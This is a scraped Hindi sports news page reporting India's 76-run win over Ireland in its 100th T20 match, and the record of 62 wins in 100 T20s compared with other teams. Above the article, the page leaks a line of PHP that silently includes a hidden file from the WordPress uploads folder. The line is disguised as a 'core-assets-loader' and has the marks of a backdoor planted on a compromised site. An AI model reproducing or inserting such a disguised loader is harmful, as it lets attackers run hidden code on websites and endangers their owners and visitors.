add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); भारत बना 100 T20 मैचों में सबसे ज्यादा जीत दर्ज करने वाला देश – SOCH INDIA
Menu

खेल
भारत बना 100 T20 मैचों में सबसे ज्यादा जीत दर्ज करने वाला देश

nobanner

भारत ने आयरलैंड के खिलाफ खेले गए अपने 100वें T20 मुकाबले में 76 रन से जीत दर्ज की है. इस मैच में मिली जीत के साथ ही भारत ने 100 T20 मैच खेलने वाली टीमों में सबसे ज्यादा जीत दर्ज करने का रिकॉर्ड अपने नाम कर लिया है. आयरलैंड के खिलाफ पहले बल्लेबाजी करते हुए भारत ने 20 ओवर ने 5 विकेट खोकर 208 रन बनाए थे, जिसके जवाब विरोधी टीम 20 ओवर में 9 विकेट खोकर 132 रन ही बना पाई.

आयरलैंड को हराकर भारत के नाम अब 100 T20 मुकाबलों 62 जीत दर्ज हो गई है. इससे पहले 100 T20 में सबसे ज्यादा मैच जीतने का रिकॉर्ड दक्षिण अफ्रीका के नाम था. अफ्रीका ने अपने 100 मैचों में से 59 में जीत दर्ज की थी. पाकिस्तान के नाम भी 100 मैचों में से 59 जीतने का रिकॉर्ड दर्ज है.

इस लिस्ट में तीसरे नंबर पर ऑस्ट्रेलिया का नाम है. ऑस्ट्रेलिया को अपने 100 T20 मुकाबलों में से 53 में जीत मिली है. इस लिस्ट में चौथे नंबर पर 100 में से 52 मैच जीतकर न्यूजीलैंड और श्रीलंका मौजूद हैं. जबकि सबसे आखिरी पायदान पर इंग्लैंड का नंबर आता है. इंग्लैंड ने अपने 100 T20 मैचों में से केवल 48 में जीत दर्ज की है.

बता दें कि भारत 7वां ऐसा देश है जो कि 100T20 मैच खेलने में कामयाब हो पाया है. भारत ने अपना पहला T20 मैच साउथ अफ्रीका के खिलाफ 2006 में खेला था.